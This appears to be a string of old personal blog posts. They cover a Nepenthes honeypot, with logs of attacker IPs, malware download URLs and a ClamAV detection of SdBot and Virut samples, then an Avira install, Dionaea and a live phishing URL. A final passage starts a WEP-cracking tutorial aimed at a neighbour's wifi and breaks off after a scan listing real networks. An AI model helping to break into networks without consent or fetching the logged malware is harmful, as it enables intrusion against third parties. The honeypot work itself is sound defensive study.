Before nepenthes
p/s: this is using default settings with minor configuration.
—————————————————-
salax@zulfiqar:~$ nmap 192.168.2.10
Starting Nmap 4.53 ( http://insecure.org ) at 2010-01-09 00:11 MYT
Interesting ports on 192.168.2.10:
Not shown: 1711 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
631/tcp open ippNmap done: 1 IP address (1 host up) scanned in 0.075 seconds
———————————-
Firing up nepenthes:
salax@zulfiqar:~$ sudo /etc/init.d/nepenthes start
[sudo] password for salax:
Starting nepenthes: nepenthes.
——————————————————-
After nepenthes:
salax@zulfiqar:~$ nmap 192.168.2.10
Starting Nmap 4.53 ( http://insecure.org ) at 2010-01-09 00:11 MYT
Interesting ports on 192.168.2.10:
Not shown: 1690 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
220/tcp open imap3
443/tcp open https
445/tcp open microsoft-ds
465/tcp open smtps
631/tcp open ipp
993/tcp open imaps
995/tcp open pop3s
1023/tcp open netvenuechat
1025/tcp open NFS-or-IIS
2105/tcp open eklogin
3372/tcp open msdtc
5000/tcp open UPnP
10000/tcp open snet-sensor-mgmt
17300/tcp open kuang2Nmap done: 1 IP address (1 host up) scanned in 0.075 seconds
———————————————————————–
List open files shows as below :
salax@zulfiqar:/etc/nepenthes$ sudo lsof -i | grep nepenthes
[sudo] password for salax:
nepenthes 7246 nepenthes 6u IPv4 29655 TCP *:smtp (LISTEN)
nepenthes 7246 nepenthes 7u IPv4 29656 TCP *:pop3 (LISTEN)
nepenthes 7246 nepenthes 8u IPv4 29657 TCP *:imap2 (LISTEN)
nepenthes 7246 nepenthes 9u IPv4 29658 TCP *:imap3 (LISTEN)
nepenthes 7246 nepenthes 10u IPv4 29659 TCP *:ssmtp (LISTEN)
nepenthes 7246 nepenthes 11u IPv4 29660 TCP *:imaps (LISTEN)
nepenthes 7246 nepenthes 12u IPv4 29661 TCP *:pop3s (LISTEN)
nepenthes 7246 nepenthes 13u IPv4 29662 TCP *:2745 (LISTEN)
nepenthes 7246 nepenthes 14u IPv4 29663 TCP *:6129 (LISTEN)
nepenthes 7246 nepenthes 15u IPv4 29664 TCP *:loc-srv (LISTEN)
nepenthes 7246 nepenthes 16u IPv4 29665 TCP *:microsoft-ds (LISTEN)
nepenthes 7246 nepenthes 17u IPv4 29666 TCP *:1025 (LISTEN)
nepenthes 7246 nepenthes 18u IPv4 29667 TCP *:ftp (LISTEN)
nepenthes 7246 nepenthes 19u IPv4 29668 TCP *:https (LISTEN)
nepenthes 7246 nepenthes 20u IPv4 29669 TCP *:17300 (LISTEN)
nepenthes 7246 nepenthes 21u IPv4 29670 TCP *:2103 (LISTEN)
nepenthes 7246 nepenthes 22u IPv4 29671 TCP *:eklogin (LISTEN)
nepenthes 7246 nepenthes 23u IPv4 29672 TCP *:2107 (LISTEN)
nepenthes 7246 nepenthes 24u IPv4 29673 TCP *:3372 (LISTEN)
nepenthes 7246 nepenthes 25u IPv4 29674 UDP *:ms-sql-m
nepenthes 7246 nepenthes 26u IPv4 29675 TCP *:3127 (LISTEN)
nepenthes 7246 nepenthes 27u IPv4 29676 TCP *:netbios-ssn (LISTEN)
nepenthes 7246 nepenthes 28u IPv4 29677 TCP *:3140 (LISTEN)
nepenthes 7246 nepenthes 29u IPv4 29678 TCP *:5554 (LISTEN)
nepenthes 7246 nepenthes 30u IPv4 29679 TCP *:1023 (LISTEN)
nepenthes 7246 nepenthes 31u IPv4 29680 TCP *:27347 (LISTEN)
nepenthes 7246 nepenthes 32u IPv4 29681 TCP *:5000 (LISTEN)
nepenthes 7246 nepenthes 33u IPv4 29682 TCP *:webmin (LISTEN)
nepenthes 7246 nepenthes 34u IPv4 29683 TCP *:nameserver (LISTEN)
nepenthes 7246 nepenthes 35u IPv4 29684 TCP *:www (LISTEN)
nepenthes 7246 nepenthes 36u IPv4 29685 TCP *:10002 (LISTEN)
——————————————————————-
Take a look in /var/log/nepenthes/logged_downloads:
salax@zulfiqar:/var/log/nepenthes$ cat logged_downloads
[2010-01-08T03:21:15] 60.48.72.2 -> 192.168.2.10 link://60.48.72.2:11965/qcxYEw==
[2010-01-08T03:23:37] 60.48.98.64 -> 192.168.2.10 ftp://a:a@60.48.98.64:11460/Win15763.exe
[2010-01-08T22:27:49] 60.47.49.168 -> 192.168.2.10 link://60.47.49.168:29913/GDAo+A==
[2010-01-09T21:59:29] 60.48.196.174 -> 192.168.2.10 ftp://1:1@0.0.0.0:5895/wint.exe
[2010-01-09T22:20:08] 60.167.120.190 -> 192.168.2.10 ftp://1:1@60.167.120.190:9495/ssms.exe
[2010-01-09T22:26:00] 60.56.171.98 -> 192.168.2.10 tftp://0.0.0.0/ssms.exe
[2010-01-09T22:31:08] 60.47.211.135 -> 192.168.2.10 link://60.47.211.135:57271/46juBw==
[2010-01-09T22:54:40] 60.48.196.174 -> 192.168.2.10 ftp://1:1@0.0.0.0:5895/wint.exe
[2010-01-09T23:20:02] 60.48.206.249 -> 192.168.2.10 ftp://1:1@60.48.206.249:31018/wingate32.exe
[2010-01-09T23:23:05] 60.53.58.190 -> 192.168.2.10 ftp://1:1@0.0.0.0:15639/WinSec.exe
[2010-01-09T23:42:31] 60.48.206.249 -> 192.168.2.10 link://60.48.206.249:50408/EWYNew==
[2010-01-10T11:48:14] 60.44.18.223 -> 192.168.2.10 blink://60.44.18.223:40579/GLJK+A==
[2010-01-10T12:10:59] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:42750/GIAo+A==
[2010-01-10T12:21:05] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:33106/GIAo+A==
[2010-01-10T12:22:13] 69.207.61.212 -> 192.168.2.10 http://74.77.18.116:4662/x.exe
[2010-01-10T12:31:20] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:41373/GIAo+A==
[2010-01-10T13:13:55] 60.42.119.172 -> 192.168.2.10 blink://60.42.119.172:29703/mPKeAQ==
[2010-01-10T13:15:21] 60.43.40.208 -> 192.168.2.10 link://60.43.40.208:46158/OHwf/g==
[2010-01-11T00:36:28] 60.48.103.18 -> 192.168.2.10 ftp://1:1@60.48.103.18:62984/wingate32.exe
[2010-01-11T00:42:24] 60.36.30.127 -> 192.168.2.10 ftp://1:1@0.0.0.0:45513/ssms.exe
[2010-01-11T00:51:16] 60.48.221.25 -> 192.168.2.10 ftp://1:1@60.48.221.25:40959/wingate32.exe
[2010-01-11T00:56:31] 60.48.103.18 -> 192.168.2.10 ftp://1:1@60.48.103.18:62984/wingate32.exe
[2010-01-11T20:10:07] 60.48.245.153 -> 192.168.2.10 link://60.48.245.153:64395/EGYNAw==
[2010-01-11T20:15:19] 60.48.245.153 -> 192.168.2.10 ftp://1:1@0.0.0.0:44154/wingate32.exe
[2010-01-11T20:18:03] 60.249.204.192 -> 192.168.2.10 tftp://0.0.0.0/ssms.exe
[2010-01-11T20:24:11] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T21:22:43] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T21:37:35] 60.41.138.161 -> 192.168.2.10 link://60.41.138.161:35057/4/idCA==
[2010-01-11T21:51:23] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T21:51:35] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:00:17] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:10:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:24841/0
[2010-01-11T22:10:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:24841/0
[2010-01-11T22:14:19] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T22:16:52] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:17:08] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:17:41] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:27:00] 60.42.243.214 -> 192.168.2.10 link://60.42.243.214:48588/+RnAEQ==
[2010-01-11T22:35:05] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:52:24] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:52:29] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:54:18] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T23:01:11] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T23:07:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:13110/0
[2010-01-11T23:07:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:6464/0
[2010-01-11T23:15:04] 60.48.70.250 -> 192.168.2.10 ftp://1:1@60.48.70.250:23241/WinSec.exe
[2010-01-11T23:17:46] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T23:17:55] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T23:18:34] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T23:21:10] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-13T03:19:57] 60.48.98.181 -> 192.168.2.10 ftp://a:a@0.0.0.0:3987/igxdfdfds.com
[2010-01-13T03:27:39] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:28:57] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:30:20] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T03:32:24] 60.48.98.181 -> 192.168.2.10 ftp://a:a@60.48.98.181:4078/Win15763.exe
[2010-01-13T03:37:06] 60.48.98.181 -> 192.168.2.10 ftp://a:a@60.48.98.181:4078/Win15763.exe
[2010-01-13T03:37:54] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:40:13] 60.48.98.181 -> 192.168.2.10 ftp://1:1@0.0.0.0:12506/wingate32.exe
[2010-01-13T03:43:58] 60.48.98.181 -> 192.168.2.10 ftp://1:1@0.0.0.0:12506/wingate32.exe
[2010-01-13T03:50:13] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:50:21] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T03:54:50] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T04:02:31] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T04:59:55] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T05:07:36] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T05:34:57] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T05:48:38] 60.42.253.163 -> 192.168.2.10 link://60.42.253.163:54497/+BkAgw==
[2010-01-13T05:50:41] 60.48.89.89 -> 192.168.2.10 ftp://1:1@60.48.89.89:59451/wingate32.exe
[2010-01-13T05:57:08] 60.48.89.89 -> 192.168.2.10 tftp://60.48.89.89/runwin32.exe
[2010-01-13T05:57:30] 60.48.89.89 -> 192.168.2.10 ftp://1:1@60.48.89.89:59451/wingate32.exe
[2010-01-13T06:26:55] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T06:27:07] 60.48.89.89 -> 192.168.2.10 tftp://0.0.0.0/runwin32.exe
[2010-01-13T06:27:30] 60.48.89.89 -> 192.168.2.10 ftp://1:1@0.0.0.0:59451/wingate32.exe
[2010-01-15T22:13:10] 124.12.75.2 -> 192.168.2.10 tftp://124.12.75.2/ssms.exe
—————————————————————————————
Take a look also in /var/log/nepenthes/logged_submissions :
salax@zulfiqar:/var/log/nepenthes$ cat logged_submissions
[2010-01-08T22:28:05] 60.47.49.168 -> 192.168.2.10 link://60.47.49.168:29913/GDAo+A== a881dd13336137c7c0a346a0e95a28cb
[2010-01-09T22:26:53] 60.56.171.98 -> 192.168.2.10 tftp://60.56.171.98:69/ssms.exe 98eb0fdadf8a403c013a8b1882ec986d
[2010-01-09T23:42:44] 60.48.206.249 -> 192.168.2.10 link://60.48.206.249:50408/EWYNew== f6a0747f321da6905d7f117b1a0491bc
[2010-01-10T11:48:15] 60.44.18.223 -> 192.168.2.10 blink://60.44.18.223:40579/GLJK+A== cf39a0e99513d242b516facffcf0149a
[2010-01-10T12:11:16] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:42750/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T12:21:12] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:33106/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T12:31:35] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:41373/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T13:13:56] 60.42.119.172 -> 192.168.2.10 blink://60.42.119.172:29703/mPKeAQ== 6560050cb210e159c9cfb5a50fe6dd63
[2010-01-10T13:15:38] 60.43.40.208 -> 192.168.2.10 link://60.43.40.208:46158/OHwf/g== 714c1bf115fe97b19a4556d40de2fec1
[2010-01-11T20:18:48] 60.249.204.192 -> 192.168.2.10 tftp://60.249.204.192:69/ssms.exe fd28c5e1c38caa35bf5e1987e6167f4c
[2010-01-11T22:10:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4921 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T22:10:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4923 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T23:07:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4735 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T23:07:48] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:3297 7dc73bfa4d78284155dd5101991eeb34
[2010-01-13T06:22:38] 60.48.89.89 -> 192.168.2.10 tftp://60.48.89.89/runwin32.exe 1eb2ae9acb444fd275f4ff1d55f4a54c
[2010-01-15T22:14:52] 124.12.75.2 -> 192.168.2.10 tftp://124.12.75.2/ssms.exe 1f8a826b2ae94daa78f6542ad4ef173b
—————————————————————————————————————-
I looked into binaries files stored:
salax@zulfiqar:/var/lib/nepenthes/binaries$ ls
1eb2ae9acb444fd275f4ff1d55f4a54c 714c1bf115fe97b19a4556d40de2fec1 a881dd13336137c7c0a346a0e95a28cb fd0a67fb35667fabc7cba1be174a66a0
1f8a826b2ae94daa78f6542ad4ef173b 7dc73bfa4d78284155dd5101991eeb34 cf39a0e99513d242b516facffcf0149a fd28c5e1c38caa35bf5e1987e6167f4c
6560050cb210e159c9cfb5a50fe6dd63 98eb0fdadf8a403c013a8b1882ec986d f6a0747f321da6905d7f117b1a0491bc
——————————————————————————————
And i’ve got lots from hexdump :
salax@zulfiqar:/var/lib/nepenthes/hexdumps$ ls
03040d7e4a4b43a51e16e23e8db372cc.bin
03b7c83b1097ec2103457238292d2c64.bin
047508ec910bbdd22bbd5b57735653cc.bin
0970bdd79407182c9b4528ea09482766.bin
0b246cefe406d265e33336b5614f03b8.bin
0bdbf63d3280cc4148dc431ee8ff9e67.bin
0cfc77783bc087dfdbc93eb848434785.bin
0e260b4030f9e03af889964cf08f1c31.bin
2b3ae3f7588a4f5598c35ccf85c57038.bin
2bed2846c40be4d0b54bd8e6570f5d65.bin
f9dc4a724a268dc50f599d91414a25a8.bin
2f25328714f52ceeb150474f9bd41ca3.bin
fc5752c2b644cf41132beac523653d6f.bin
32389a3b6d15c6b658c8c0ad0869e617.bin
33103e04b2b192f40a1a78091bb7fe5a.bin
fff4bb5b930ca56719bea26e22152165.bin
34557adc8990ee198c75a6446916f9fc.bin
——8<------------------------------------8<---------------------cutted-----8<
————————————————————————————————————————
Then, scanning using ClamAV:
salax@zulfiqar:/var/lib/nepenthes$ clamscan binaries/
LibClamAV Warning: **************************************************
LibClamAV Warning: *** The virus database is older than 7 days! ***
LibClamAV Warning: *** Please update it as soon as possible. ***
LibClamAV Warning: **************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON’T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
binaries/fd0a67fb35667fabc7cba1be174a66a0: OK
binaries/cf39a0e99513d242b516facffcf0149a: OK
binaries/714c1bf115fe97b19a4556d40de2fec1: W32.Virut.sa FOUND
binaries/7dc73bfa4d78284155dd5101991eeb34: Trojan.SdBot-730 FOUND
binaries/1f8a826b2ae94daa78f6542ad4ef173b: Trojan.SdBot-4763 FOUND
binaries/fd28c5e1c38caa35bf5e1987e6167f4c: Trojan.SdBot-4763 FOUND
binaries/f6a0747f321da6905d7f117b1a0491bc: OK
binaries/98eb0fdadf8a403c013a8b1882ec986d: Trojan.SdBot-4763 FOUND
binaries/a881dd13336137c7c0a346a0e95a28cb: W32.Virut-17 FOUND
binaries/1eb2ae9acb444fd275f4ff1d55f4a54c: OK
binaries/6560050cb210e159c9cfb5a50fe6dd63: OK
binaries/df51e3310ef609e908a6b487a28ac068: Trojan.SdBot-4763 FOUND———– SCAN SUMMARY ———–
Known viruses: 572978
Engine version: 0.94.2
Scanned directories: 1
Scanned files: 12
Infected files: 7
Data scanned: 1.30 MB
Time: 2.564 sec (0 m 2 s)
to be continued….lot’s to learn here 
and also for dionae………
==Install==
salax@salax-laptop:~/Downloads$ wget http://dlpe.antivir.com/package/wks_avira/unix/en/pers/antivir_workstation-pers.tar.gz
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./installStarting AVIRA AntiVir Workstation (UNIX) 3.0.5-12 installation…
Before installing this software, you must agree to the terms
of the license.Use the arrow keys to scroll through the license. When you
are finished reading, press ‘q’ to exit the viewer.Press <ENTER> to view the license.
Licence agreement Avira AntiVir Personal – Free AntiVirus
===============================================================
Please read through the following software licence agreement. By installing the
software, you explicitly agree to be bound by the conditions of this agreement.
If you do not accept the conditions of this agreement, you may not use the softw
are.———–8<———–8<—————————–cutted
Do you agree to the license terms? [n] y
creating /usr/lib/AntiVir … done
copying AV_WKS_PERS to /usr/lib/AntiVir/ … done
copying LICENSE to /usr/lib/AntiVir/LICENSE-workstation … done1) installing AntiVir Core Components (Engine, Savapi and Avupdate)
copying uninstall to /usr/lib/AntiVir/ … done
copying uninstall_smcplugin.sh to /usr/lib/AntiVir/ … done
copying etc/file_list to /usr/lib/AntiVir/ … done
copying etc/dir_list to /usr/lib/AntiVir/ … done
copying etc/run.inf to /usr/lib/AntiVir/ … done———-8<—————–8<—————-cutted
installation of AntiVir Core Components (Engine, Savapi and Avupdate) complete
2) Configuring updates
An internet updater is available with version 3.0.5-12 of
AVIRA AntiVir Workstation (UNIX). It will ensure that you always have the latest
virus signatures and engine updates.
In order to trigger an update you will need to run the command:/usr/lib/AntiVir/avupdate –product=Guard
Please read the README file for more information about updating and
which method best suits you.Would you like to create a link in /usr/sbin for avupdate ? [y]
linking /usr/sbin/avupdate to /usr/lib/AntiVir/avupdate … doneWould you like to setup Engine and Signature updates as cron task ? [y]
Please specify the interval to check.
Recommended values are daily or 2 hours.available options: d [2] 5
creating Engine/Signature update cronjob … doneWould you like to check for Guard updates once a week ? [n]
setup internet updater complete
3) installing main program
copying doc/avserver_en.pdf to /usr/lib/AntiVir/ … done
stop running AVIRA AntiVir Workstation (UNIX) … done
copying bin/linux_glibc22/libdazuko2.so to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/libdazuko3compat2.so to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard-ondemand-mgmt to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard-scanner to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avscan to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avsavapi-super to /usr/lib/AntiVir/ … done
copying bin/linux_glibc22/avguard.bin to /usr/lib/AntiVir/ … done
Dazukofs module is loadedlinking /usr/lib/AntiVir/libdazuko.so to /usr/lib/AntiVir/libdazuko3compat2.so … done
Guard will automatically protect all directories
which are mounted upon dazukofs filesystem.Please specify at least one directory to be protected
by Guard to add in /etc/fstab : [/home]
The following directories will be protected by Guard:
/homeIf you want to remove or include more directories
you will need to edit your /etc/fstab file and remount dazukofs.backup original /etc/fstab to /etc/fstab.orig
adding DazukoFS IncludePath /home to /etc/fstab … done
Mounting /home as dazukofs…copying etc/avscan.conf to /etc/avira/ … done
copying etc/avscan.conf to /etc/avira/avscan.conf.default … done
copying script/avira_start.sh.template to /usr/lib/AntiVir/avguard … done
copying script/avguard_start.sh to /usr/lib/AntiVir/ … done
copying script/avguard_restart.sh to /usr/lib/AntiVir/ … done
copying script/avguard_stop.sh to /usr/lib/AntiVir/ … done
copying script/avguard_post.sh to /usr/lib/AntiVir/ … done
copying script/avguardkey_post.sh to /usr/lib/AntiVir/ … done
creating /home/quarantine … already existsWould you like to install the AVIRA Guard GNOME plugin ? [n] y
installing AVIRA Guard GNOME plugin …
*** Installing pre-compiled applet
done
linking /usr/bin/avscan to /usr/lib/AntiVir/avscan … done
linking /usr/bin/scan to /usr/lib/AntiVir/avscan … doneWould you like to create a link in /usr/sbin for avguard ? [y]
linking /usr/sbin/avguard to /usr/lib/AntiVir/avguard … donePlease specify if boot scripts should be set up.
Set up boot scripts [y]:
setting up boot script … doneinstallation of AVIRA Guard complete
4) activate SMC support
If you are going to use AVIRA Security Management Center (SMC)
to manage this software remotely you need thisWould you like to activate SMC support? [y] n
SMC will NOT be activated
checking for existing /etc/avira/avguard.conf … not found
copying etc/avguard.conf to /etc/avira/ … done
copying etc/avguard.conf to /etc/avira/avguard.conf.default … done
checking for existing /etc/avira/avguard-scanner.conf … not found
copying etc/avguard-scanner.conf to /etc/avira/ … done————8<————————–8<—————cutted
Would you like to start AVIRA Guard now? [y] y
Starting AVIRA AntiVir Workstation Personal …
Starting: avguard.binInstallation of the following features complete:
AntiVir Core Components (Engine, Savapi and Avupdate)
AVIRA Internet Updater
AVIRA Guard***********************************************************
Configuration files:
/etc/avira/avguard.conf (AVIRA Guard main config)
/etc/avira/avscan.conf (AVIRA Guard avscan config)
/etc/avira/avguard-scanner.conf (AVIRA Guard scanner config)
/etc/avira/avupdate.conf (AVIRA Avupdate options)
***********************************************************Note: It is highly recommended that you perform an update now to
ensure up-to-date protection. This can be done by running:/usr/lib/AntiVir/avupdate –product=Guard
Be sure to read the README file for additional information.
Thank you for your interest in AVIRA AntiVir Workstation (UNIX).
Then, I reboot and check the process:
root@salax-laptop:~# ps auxwww|grep avira
root 6259 0.5 1.9 45736 39756 pts/0 S 16:04 0:03 /usr/lib/AntiVir/savapi –config=/etc/avira/avguard-scanner.conf –pid-dir=/var/run/avguard/ –temp=/var/run/avguard/savinst-vNPLDw/ -N –allow-remote-shutdown –socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6260 5.2 1.9 46292 39932 pts/0 S 16:04 0:34 /usr/lib/AntiVir/savapi –config=/etc/avira/avguard-scanner.conf –pid-dir=/var/run/avguard/ –temp=/var/run/avguard/savinst-vNPLDw/ -N –allow-remote-shutdown –socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6300 4.8 1.9 46296 39968 pts/0 S 16:08 0:20 /usr/lib/AntiVir/savapi –config=/etc/avira/avguard-scanner.conf –pid-dir=/var/run/avguard/ –temp=/var/run/avguard/savinst-vNPLDw/ -N –allow-remote-shutdown –socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6301 7.7 1.9 46300 39856 pts/0 S 16:08 0:33 /usr/lib/AntiVir/savapi –config=/etc/avira/avguard-scanner.conf –pid-dir=/var/run/avguard/ –temp=/var/run/avguard/savinst-vNPLDw/ -N –allow-remote-shutdown –socket-file=/var/run/avguard/savinst-vNPLDw/scanner
root 6628 0.0 0.0 3336 804 pts/0 S+ 16:15 0:00 grep avira
Uninstall? Simply :
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./uninstall
[sudo] password for salax:
uninstall [--product=productname] [--no-interactive] [--force] [--version] [--help]installed products:
Guard
Scanner
salax@salax-laptop:~/Downloads/antivir-workstation-pers-3.0.5-12$ sudo ./uninstall –product=Guard
Hi there, hope all is well..
Last week, I’ve been given opportunity to learn on configuring and play around with Dionaea, the successor for nepenthes. It’s been great honor for a newbie like me to join the training and learn together with other staffs.
To begin with, I’m actually new to this.. With Nepenthes, I just managed / able to install and configure the program, and never really had chance to understand how the program works, and don’t have many experience with it (one of the reason is because I’m tooo lazy, yes, I admit it :-p). Install, configure, and put in public IP at my home.. and waits for some alerts to come out..
For Dionaea, I’ve followed the tutorial at their main page http://dionaea.carnivore.it/ , and managed to install / configure all the dependencies.. Once installed, I try to test with some exploits / nmapping .. cool 
also have Http server under /opt/dionaea/var/dionaea/wwwroot , for fast http server. Frankly speaking, during the training, I can’t catch all of the explanations , the codes (since i’m a N0ob in programming), and bla2.. But I’m amazed by how the program works.. they( the developers) must be some kind of beautiful mind person for developing this ;-p
I’ve done my installation/configuration on top of Ubuntu 9.04.. This shouldn’t be problem for *buntu and Debian users.. other distros I don’t know, haven’t try.
If you would like to try it out:
http://dionaea.carnivore.it/
http://carnivore.it/2009/12/02/dionaea_first_tc_kul_12-09 (blog)
screenshot when dionaea in action:
This is another example of phishing site that available out there. Users with little knowledge will be tricked to enter their personal data such as account number and pin number. http://www.classm2u.com/M2ULogin.htm . Beware of phishing sites since many tend to use Internet Explorer than Mozilla Firefox . When I test to open it using IE 8, it doesn’t provide any warning for it. This same goes to Google Chrome browser. The alert only appears on Mozilla Firefox. Currently, I’m using 3.5.5.
Hi, this simple tutorial is for cracking wep wifi keys..
My gear :
Lenovo IBM Thinkpad T60 with Intel wireless card embedded. — normal wifi card
Ubuntu 9.04 32bit
My practice target:
Wifi AP on my next home, UTP practical student
Ok lets start:
1.First, because it is not backtrack, i’m gonna have to install aircrack-ng.
sudo apt-get install aircrack-ng
Then, use Kismet or ‘iwlist’ to search or wardrive (in my case i don’t wardrive, juz sitting in my room ) wifi access points
in this example, i’m using iwlist:
2.
sudo iwlist wlan0 scanning
salax@salax-laptop:~$ sudo iwlist wlan0 scanning
wlan0 Scan completed :
Cell 01 – Address: 00:1C:DF:CD:84:74
ESSID:”Soul Society”
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=74/100 Signal level:-60 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 000C536F756C20536F6369657479
IE: Unknown: 010882848B962430486C
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 2F0100
IE: IEEE 802.11i/WPA2 Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: 32040C121860
IE: Unknown: DD970050F204104A0001101044000
IE: Unknown: DD090010180200F0000000
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (2) : CCMP TKIP
Authentication Suites (1) : PSK
IE: Unknown: DD180050F2020101800003A4000027A4000042435E0062322F00
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
12 Mb/s; 48 Mb/s
Extra:tsf=0000001b713e8183
Extra: Last beacon: 460ms ago
Cell 02 – Address: 00:1E:40:DD:81:60
ESSID:”PETRONAS1″
Mode:Master
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=51/100 Signal level:-78 dBm Noise level=-97 dBm
Encryption key:on
IE: Unknown: 0009504554524F4E415331
IE: Unknown: 010482848B96
IE: Unknown: 03010A
IE: Unknown: DD060010180205F0
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
Extra:tsf=00000000b2840fc4
Extra: Last beacon: 328ms ago
Cell 03 – Address: CE:9F:F0:61:B3:05
ESSID:”mariam”
Mode:Ad-Hoc
Channel:10
Frequency:2.457 GHz (Channel 10)
Quality=48/100 Signal level:-80 dBm Noise level=-97 dBm
Encryption key:off
IE: Unknown: 00066D617269616D
IE: Unknown: 010882848B960C183048
IE: Unknown: 03010A
IE: Unknown: 06020000
IE: Unknown: 2A0107
IE: Unknown: 32041224606C
IE: Unknown: DD070050F202000100
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000053cd9d3d6
Extra: Last beacon: 280ms ago
Cell 04 – Address: 00:21:91:35:0F:1B
